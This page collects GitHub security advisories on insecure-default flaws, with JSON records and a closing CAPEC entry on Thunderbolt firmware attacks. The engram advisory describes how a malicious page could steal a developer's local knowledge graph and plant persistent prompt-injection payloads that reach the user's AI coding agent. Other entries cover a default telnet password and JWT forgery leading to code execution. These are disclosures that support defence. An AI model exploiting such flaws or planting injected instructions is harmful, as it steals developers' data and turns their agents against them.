The local HTTP server started by engram server (binding 127.0.0.1:7337 by default) was exposed to any browser origin with no authentication unless ENGRAM_API_TOKEN was explicitly set. Combined with Access-Control-Allow-Origin: * on every response and a body parser that did not require Content-Type: application/json, this allowed a malicious web page the developer visited to:

  1. Exfiltrate the local knowledge graph via GET /query and GET /stats (function names, file layout, recorded decisions/mistakes).
  2. Inject persistent prompt-injection payloads via POST /learn, which wrote mistake/decision nodes that were later surfaced as system-reminders to the user's AI coding agent on every future session and file edit.

Severity: High — confidentiality + persistent indirect prompt injection against the user's coding agent.

Affected versions

engramx >= 1.0.0, < 2.0.2 — any version that shipped the HTTP server.

Patched in

engramx@2.0.2

Workarounds (if you cannot upgrade)

  • Do not run engram server or engram ui.
  • If developers must, set ENGRAM_API_TOKEN to a long random value and terminate the server before browsing the web.

Remediation (applied in 2.0.2)

  1. Fail-closed auth on every non-public route — Bearer header or HttpOnly cookie, constant-time comparison, 256-bit auto-generated token at ~/.engram/http-server.token (0600).
  2. Wildcard CORS removed entirely; default is no CORS headers. Opt-in allowlist via ENGRAM_ALLOWED_ORIGINS.
  3. Host + Origin validation — rejects DNS rebinding and Host spoofing.
  4. Content-Type: application/json enforced on mutations — blocks the text/plain CSRF vector.
  5. /ui?token= bootstrap with Sec-Fetch-Site gate — prevents cross-origin oracle probing.

Credit

Discovered and responsibly disclosed by @gabiudrescu in engram issue #7.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "engramx"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-306",
      "CWE-352",
      "CWE-942"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T14:52:03Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe local HTTP server started by `engram server` (binding `127.0.0.1:7337` by default) was exposed to any browser origin with no authentication unless `ENGRAM_API_TOKEN` was explicitly set. Combined with `Access-Control-Allow-Origin: *` on every response and a body parser that did not require `Content-Type: application/json`, this allowed a malicious web page the developer visited to:\n\n1. **Exfiltrate** the local knowledge graph via `GET /query` and `GET /stats` (function names, file layout, recorded decisions/mistakes).\n2. **Inject persistent prompt-injection payloads** via `POST /learn`, which wrote `mistake`/`decision` nodes that were later surfaced as system-reminders to the user\u0027s AI coding agent on every future session and file edit.\n\nSeverity: **High** \u2014 confidentiality + persistent indirect prompt injection against the user\u0027s coding agent.\n\n### Affected versions\n\n`engramx` \u003e= 1.0.0, \u003c 2.0.2 \u2014 any version that shipped the HTTP server.\n\n### Patched in\n\n`engramx@2.0.2`\n\n### Workarounds (if you cannot upgrade)\n\n- Do **not** run `engram server` or `engram ui`.\n- If developers must, set `ENGRAM_API_TOKEN` to a long random value and terminate the server before browsing the web.\n\n### Remediation (applied in 2.0.2)\n\n1. Fail-closed auth on every non-public route \u2014 Bearer header or HttpOnly cookie, constant-time comparison, 256-bit auto-generated token at `~/.engram/http-server.token` (0600).\n2. Wildcard CORS removed entirely; default is no CORS headers. Opt-in allowlist via `ENGRAM_ALLOWED_ORIGINS`.\n3. Host + Origin validation \u2014 rejects DNS rebinding and Host spoofing.\n4. `Content-Type: application/json` enforced on mutations \u2014 blocks the text/plain CSRF vector.\n5. `/ui?token=` bootstrap with `Sec-Fetch-Site` gate \u2014 prevents cross-origin oracle probing.\n\n### Credit\n\nDiscovered and responsibly disclosed by @gabiudrescu in engram issue #7.",
  "id": "GHSA-2r2p-4cgf-hv7h",
  "modified": "2026-04-22T14:52:03Z",
  "published": "2026-04-22T14:52:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NickCirv/engram/security/advisories/GHSA-2r2p-4cgf-hv7h"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NickCirv/engram/issues/7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NickCirv/engram"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "engram: HTTP server CORS wildcard + auth-off-by-default enables CSRF graph exfiltration and persistent indirect prompt injection"
}

GHSA-2VQ9-J58H-2QJ3

Vulnerability from github – Published: 2026-07-07 12:31 – Updated: 2026-07-07 12:31
VLAI
Details

A flaw was found in SSSD's LDAP sudo provider. When the ldap_sudo_search_base option is not explicitly configured, SSSD searches the entire LDAP directory tree for sudoRole objects. An authenticated attacker with write access to any subtree can inject a sudoRole object granting root-level sudo privileges on all SSSD-enrolled hosts.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-14474"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-07T10:16:39Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in SSSD\u0027s LDAP sudo provider. When the ldap_sudo_search_base option is not explicitly configured, SSSD searches the entire LDAP directory tree for sudoRole objects. An authenticated attacker with write access to any subtree can inject a sudoRole object granting root-level sudo privileges on all SSSD-enrolled hosts.",
  "id": "GHSA-2vq9-j58h-2qj3",
  "modified": "2026-07-07T12:31:35Z",
  "published": "2026-07-07T12:31:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14474"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-14474"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496556"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2WC3-9W3J-8PHW

Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2022-05-13 01:47
VLAI
Details

Zyxel WRE6505 devices have a default TELNET password of 1234 for the root and admin accounts, which makes it easier for remote attackers to conduct DNS hijacking attacks by reconfiguring the built-in dnshijacker process.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-7964"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-04-19T16:59:00Z",
    "severity": "CRITICAL"
  },
  "details": "Zyxel WRE6505 devices have a default TELNET password of 1234 for the root and admin accounts, which makes it easier for remote attackers to conduct DNS hijacking attacks by reconfiguring the built-in dnshijacker process.",
  "id": "GHSA-2wc3-9w3j-8phw",
  "modified": "2022-05-13T01:47:14Z",
  "published": "2022-05-13T01:47:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7964"
    },
    {
      "type": "WEB",
      "url": "https://www.oxy-gen.mobi/blog.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-32CC-X95P-FXCG

Vulnerability from github – Published: 2026-02-05 00:36 – Updated: 2026-02-10 02:56
VLAI
Summary
FUXA Unauthenticated Remote Code Execution via Hardcoded JWT Secret in Default Configuration
Details

Description

An insecure default configuration in FUXA allows an unauthenticated, remote attacker to gain administrative access and execute arbitrary code on the server. This affects FUXA through version 1.2.9 when authentication is enabled, but the administrator JWT secret is not configured. This issue has been patched in FUXA version 1.2.10.

Impact

The FUXA documentation allows administrators to manually update a hardcoded JWT secret when enabling authentication. This feature was not available in the UI. This results in a fail-open security posture, where the application can report or appear to be operating in secureEnabled mode while still accepting tokens signed with a publicly known key.

Exploitation allows an unauthenticated, remote attacker to forge JWTs to bypass all authentication mechanisms and obtain administrative access to the FUXA instance. With these elevated privileges, the attacker can interact with administrative APIs, including intended features designed for automation and scripting, to execute arbitrary code in the context of the FUXA service. Depending on deployment configuration and permissions, this may lead to full system compromise and could further expose connected ICS/SCADA environments to follow-on actions.

Patches

This issue has been patched in FUXA version 1.2.10. Users are strongly encouraged to update to the latest available release.

Notes

GitHub stated this vulnerability is identical to CVE-2025-69971, which was published against the repository out of band before coordinated disclosure concluded. CVE-2025-69971 is directionally correct, but the description is inaccurate. Please refer to this advisory for the proper description and affected versions.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.2.9"
      },
      "package": {
        "ecosystem": "npm",
        "name": "fuxa-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25894"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-05T00:36:30Z",
    "nvd_published_at": "2026-02-09T23:16:05Z",
    "severity": "CRITICAL"
  },
  "details": "### Description\nAn insecure default configuration in FUXA allows an unauthenticated, remote attacker to gain administrative access and execute arbitrary code on the server. This affects FUXA through version 1.2.9 when authentication is enabled, but the administrator JWT secret is not configured. This issue has been patched in FUXA version 1.2.10.\n\n### Impact\nThe FUXA documentation allows administrators to manually update a hardcoded JWT secret when enabling authentication. This feature was not available in the UI. This results in a fail-open security posture, where the application can report or appear to be operating in `secureEnabled` mode while still accepting tokens signed with a publicly known key.\n\nExploitation allows an unauthenticated, remote attacker to forge JWTs to bypass all authentication mechanisms and obtain administrative access to the FUXA instance. With these elevated privileges, the attacker can interact with administrative APIs, including intended features designed for automation and scripting, to execute arbitrary code in the context of the FUXA service. Depending on deployment configuration and permissions, this may lead to full system compromise and could further expose connected ICS/SCADA environments to follow-on actions.\n\n### Patches\nThis issue has been patched in FUXA version 1.2.10. Users are strongly encouraged to update to the latest available release.\n\n### Notes\nGitHub stated this vulnerability is identical to CVE-2025-69971, which was published against the repository out of band before coordinated disclosure concluded. CVE-2025-69971 is directionally correct, but the description is inaccurate. Please refer to this advisory for the proper description and affected versions.",
  "id": "GHSA-32cc-x95p-fxcg",
  "modified": "2026-02-10T02:56:48Z",
  "published": "2026-02-05T00:36:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/security/advisories/GHSA-32cc-x95p-fxcg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25894"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/commit/ea7b3df066f9fdef8ecdce318398ae40546bc50d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/frangoteam/FUXA"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/releases/tag/v1.2.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "FUXA Unauthenticated Remote Code Execution via Hardcoded JWT Secret in Default Configuration"
}

GHSA-32CP-9H8G-XVHR

Vulnerability from github – Published: 2025-03-09 21:30 – Updated: 2025-03-09 21:30
VLAI
Details

A vulnerability was found in Mage AI 0.9.75. It has been classified as problematic. This affects an unknown part. The manipulation leads to insecure default initialization of resource. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. After 7 months of repeated follow-ups by the researcher, Mage AI has decided to not accept this issue as a valid security vulnerability and has confirmed that they will not be addressing it.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-2129"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-09T20:15:27Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was found in Mage AI 0.9.75. It has been classified as problematic. This affects an unknown part. The manipulation leads to insecure default initialization of resource. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. After 7 months of repeated follow-ups by the researcher, Mage AI has decided to not accept this issue as a valid security vulnerability and has confirmed that they will not be addressing it.",
  "id": "GHSA-32cp-9h8g-xvhr",
  "modified": "2025-03-09T21:30:53Z",
  "published": "2025-03-09T21:30:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2129"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zn9988/publications/blob/main/2.Mage-AI%20-%20Insecure%20Default%20Authentication%20Setup%20Leading%20to%20Zero-Click%20RCE/README.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.299049"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.299049"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.510690"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-3633-JV58-FG5J

Vulnerability from github – Published: 2022-05-24 16:54 – Updated: 2022-12-09 21:30
VLAI
Details

IBM Open Power Firmware OP910 and OP920 could allow access to BMC via IPMI using default OpenBMC password even after BMC password was changed away from the default password. IBM X-Force ID: 158702.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-4169"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-08-26T15:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "IBM Open Power Firmware OP910 and OP920 could allow access to BMC via IPMI using default OpenBMC password even after BMC password was changed away from the default password. IBM X-Force ID: 158702.",
  "id": "GHSA-3633-jv58-fg5j",
  "modified": "2022-12-09T21:30:48Z",
  "published": "2022-05-24T16:54:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-4169"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/158702"
    },
    {
      "type": "WEB",
      "url": "http://www.ibm.com/support/docview.wss?uid=ibm10881209"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.